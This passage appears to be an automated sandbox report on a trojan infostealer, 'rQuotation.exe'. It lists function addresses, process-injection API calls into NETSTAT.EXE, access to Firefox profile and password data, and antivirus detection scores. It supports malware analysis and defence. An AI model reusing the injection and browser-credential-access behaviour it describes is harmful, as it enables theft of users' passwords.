              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342C00 NtQueryInformationProcess,5_2_03342C00
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342CF0 NtOpenProcess,5_2_03342CF0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342CC0 NtQueryVirtualMemory,5_2_03342CC0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03343010 NtOpenDirectoryObject,5_2_03343010
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03343090 NtSetValueKey,5_2_03343090
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03343D10 NtOpenProcessToken,5_2_03343D10
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03343D70 NtOpenThread,5_2_03343D70
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A79A90 NtDeleteFile,5_2_02A79A90
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A79B30 NtClose,5_2_02A79B30
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A79830 NtCreateFile,5_2_02A79830
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A799A0 NtReadFile,5_2_02A799A0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A79C90 NtAllocateVirtualMemory,5_2_02A79C90
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00858B230_2_00858B23
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0086F2E30_2_0086F2E3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008502FB0_2_008502FB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008423830_2_00842383
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008423900_2_00842390
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008503030_2_00850303
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008505230_2_00850523
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00856D230_2_00856D23
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084E5230_2_0084E523
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00842EE00_2_00842EE0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084E6670_2_0084E667
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084E6730_2_0084E673
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017581580_2_01758158
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C01000_2_016C0100
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176A1180_2_0176A118
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017881CC0_2_017881CC
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017901AA0_2_017901AA
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017841A20_2_017841A2
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017620000_2_01762000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178A3520_2_0178A352
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE3F00_2_016DE3F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017903E60_2_017903E6
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017702740_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017502C00_2_017502C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D05350_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017905910_2_01790591
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017824460_2_01782446
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017744200_2_01774420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177E4F60_2_0177E4F6
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D07700_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F47500_2_016F4750
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CC7C00_2_016CC7C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EC6E00_2_016EC6E0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E69620_2_016E6962
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A00_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0179A9A60_2_0179A9A6
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D28400_2_016D2840
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DA8400_2_016DA840
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE8F00_2_016FE8F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B68B80_2_016B68B8
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178AB400_2_0178AB40
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01786BD70_2_01786BD7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CEA800_2_016CEA80
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176CD1F0_2_0176CD1F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DAD000_2_016DAD00
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CADE00_2_016CADE0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E8DBF0_2_016E8DBF
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0C000_2_016D0C00
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C0CF20_2_016C0CF2
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770CB50_2_01770CB5
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01744F400_2_01744F40
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01772F300_2_01772F30
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01712F280_2_01712F28
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F0F300_2_016F0F30
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C2FC80_2_016C2FC8
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174EFA00_2_0174EFA0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0E590_2_016D0E59
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178EE260_2_0178EE26
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178EEDB0_2_0178EEDB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178CE930_2_0178CE93
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E2E900_2_016E2E90
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0179B16B0_2_0179B16B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BF1720_2_016BF172
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0170516C0_2_0170516C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DB1B00_2_016DB1B0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017870E90_2_017870E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178F0E00_2_0178F0E0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D70C00_2_016D70C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177F0CC0_2_0177F0CC
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BD34C0_2_016BD34C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178132D0_2_0178132D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0171739A0_2_0171739A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017712ED0_2_017712ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016ED2F00_2_016ED2F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EB2C00_2_016EB2C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D52A00_2_016D52A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017875710_2_01787571
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017995C30_2_017995C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176D5B00_2_0176D5B0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C14600_2_016C1460
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178F43F0_2_0178F43F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178F7B00_2_0178F7B0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017156300_2_01715630
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017816CC0_2_017816CC
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D99500_2_016D9950
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EB9500_2_016EB950
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017659100_2_01765910
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173D8000_2_0173D800
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D38E00_2_016D38E0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178FB760_2_0178FB76
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01745BF00_2_01745BF0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0170DBF90_2_0170DBF9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EFB800_2_016EFB80
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01743A6C0_2_01743A6C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178FA490_2_0178FA49
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01787A460_2_01787A46
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177DAC60_2_0177DAC6
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01715AA00_2_01715AA0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01771AA30_2_01771AA3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176DAAC0_2_0176DAAC
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01787D730_2_01787D73
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01781D5A0_2_01781D5A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D3D400_2_016D3D40
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EFDC00_2_016EFDC0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01749C320_2_01749C32
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178FCF20_2_0178FCF2
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178FF090_2_0178FF09
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01693FD20_2_01693FD2
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01693FD50_2_01693FD5
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178FFB10_2_0178FFB1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D1F920_2_016D1F92
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D9EB00_2_016D9EB0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CA3525_2_033CA352
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0331E3F05_2_0331E3F0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033D03E65_2_033D03E6
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033B02745_2_033B0274
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033902C05_2_033902C0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033AA1185_2_033AA118
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033001005_2_03300100
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033981585_2_03398158
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033D01AA5_2_033D01AA
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C41A25_2_033C41A2
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C81CC5_2_033C81CC
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033A20005_2_033A2000
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033107705_2_03310770
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033347505_2_03334750
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0330C7C05_2_0330C7C0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0332C6E05_2_0332C6E0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033105355_2_03310535
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033D05915_2_033D0591
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033B44205_2_033B4420
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C24465_2_033C2446
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033BE4F65_2_033BE4F6
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CAB405_2_033CAB40
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C6BD75_2_033C6BD7
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0330EA805_2_0330EA80
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033269625_2_03326962
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033129A05_2_033129A0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033DA9A65_2_033DA9A6
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0331A8405_2_0331A840
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033128405_2_03312840
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032F68B85_2_032F68B8
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0333E8F05_2_0333E8F0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03330F305_2_03330F30
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033B2F305_2_033B2F30
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03352F285_2_03352F28
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03384F405_2_03384F40
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0338EFA05_2_0338EFA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03302FC85_2_03302FC8
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CEE265_2_033CEE26
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03310E595_2_03310E59
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03322E905_2_03322E90
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CCE935_2_033CCE93
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CEEDB5_2_033CEEDB
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033ACD1F5_2_033ACD1F
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0331AD005_2_0331AD00
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03328DBF5_2_03328DBF
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0330ADE05_2_0330ADE0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03310C005_2_03310C00
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033B0CB55_2_033B0CB5
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03300CF25_2_03300CF2
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C132D5_2_033C132D
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032FD34C5_2_032FD34C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0335739A5_2_0335739A
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033152A05_2_033152A0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0332D2F05_2_0332D2F0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033B12ED5_2_033B12ED
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0332B2C05_2_0332B2C0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033DB16B5_2_033DB16B
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0334516C5_2_0334516C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032FF1725_2_032FF172
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0331B1B05_2_0331B1B0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C70E95_2_033C70E9
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CF0E05_2_033CF0E0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033170C05_2_033170C0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033BF0CC5_2_033BF0CC
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CF7B05_2_033CF7B0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033556305_2_03355630
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C16CC5_2_033C16CC
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C75715_2_033C7571
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033AD5B05_2_033AD5B0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033D95C35_2_033D95C3
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CF43F5_2_033CF43F
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033014605_2_03301460
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CFB765_2_033CFB76
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0332FB805_2_0332FB80
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03385BF05_2_03385BF0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0334DBF95_2_0334DBF9
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03383A6C5_2_03383A6C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CFA495_2_033CFA49
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C7A465_2_033C7A46
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03355AA05_2_03355AA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033ADAAC5_2_033ADAAC
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033B1AA35_2_033B1AA3
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033BDAC65_2_033BDAC6
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033A59105_2_033A5910
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033199505_2_03319950
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0332B9505_2_0332B950
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0337D8005_2_0337D800
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033138E05_2_033138E0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CFF095_2_033CFF09
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CFFB15_2_033CFFB1
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03311F925_2_03311F92
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032D3FD55_2_032D3FD5
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032D3FD25_2_032D3FD2
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03319EB05_2_03319EB0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C7D735_2_033C7D73
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033C1D5A5_2_033C1D5A
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03313D405_2_03313D40
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0332FDC05_2_0332FDC0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03389C325_2_03389C32
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033CFCF25_2_033CFCF2
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A622F05_2_02A622F0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A7C1805_2_02A7C180
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A5B3C05_2_02A5B3C0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A5D3C05_2_02A5D3C0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A5D1A05_2_02A5D1A0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A5D1985_2_02A5D198
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A5B5045_2_02A5B504
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A5B5105_2_02A5B510
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A63BC05_2_02A63BC0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A659C05_2_02A659C0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0307E3535_2_0307E353
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0307E2345_2_0307E234
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_030852FC5_2_030852FC
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0307D7B85_2_0307D7B8
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0307E6ED5_2_0307E6ED
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0307C9A15_2_0307C9A1
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0307E86E5_2_0307E86E
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 6_2_0550FD106_2_0550FD10
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 6_2_0550ADE06_2_0550ADE0
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 6_2_05508DE06_2_05508DE0
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 6_2_055115E06_2_055115E0
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 6_2_05508F306_2_05508F30
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 6_2_05508F246_2_05508F24
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 6_2_0550ABC06_2_0550ABC0
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 6_2_055133E06_2_055133E0
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 6_2_0550ABB86_2_0550ABB8
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeCode function: 6_2_05529BA06_2_05529BA0
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000001610DF872FC7_2_000001610DF872FC
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000001610DF806ED7_2_000001610DF806ED
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000001610DF802347_2_000001610DF80234
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000001610DF7E9A17_2_000001610DF7E9A1
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000001610DF8086E7_2_000001610DF8086E
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000001610DF7F7B87_2_000001610DF7F7B8
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000001610DF803537_2_000001610DF80353
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: String function: 0174F290 appears 103 times
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: String function: 0173EA12 appears 86 times
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: String function: 01717E54 appears 107 times
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: String function: 016BB970 appears 262 times
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: String function: 01705130 appears 58 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 032FB970 appears 262 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03357E54 appears 107 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0338F290 appears 103 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03345130 appears 58 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0337EA12 appears 86 times
              Source: rQuotation.exeStatic PE information: No import functions for PE file found
              Source: rQuotation.exe, 00000000.00000002.2022344447.0000000001961000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rQuotation.exe
              Source: rQuotation.exe, 00000000.00000003.1929221288.000000000144F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rQuotation.exe
              Source: rQuotation.exe, 00000000.00000003.2021707048.000000000123D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs rQuotation.exe
              Source: rQuotation.exe, 00000000.00000003.1931437975.000000000160B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rQuotation.exe
              Source: rQuotation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: rQuotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: rQuotation.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@13/8
              Source: C:\Windows\SysWOW64\NETSTAT.EXEFile created: C:\Users\user\AppData\Local\Temp\x5R95RwlJump to behavior
              Source: rQuotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\rQuotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: NETSTAT.EXE, 00000005.00000002.3572452418.0000000002E5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: rQuotation.exeReversingLabs: Detection: 71%
              Source: rQuotation.exeVirustotal: Detection: 79%
              Source: unknownProcess created: C:\Users\user\Desktop\rQuotation.exe "C:\Users\user\Desktop\rQuotation.exe"
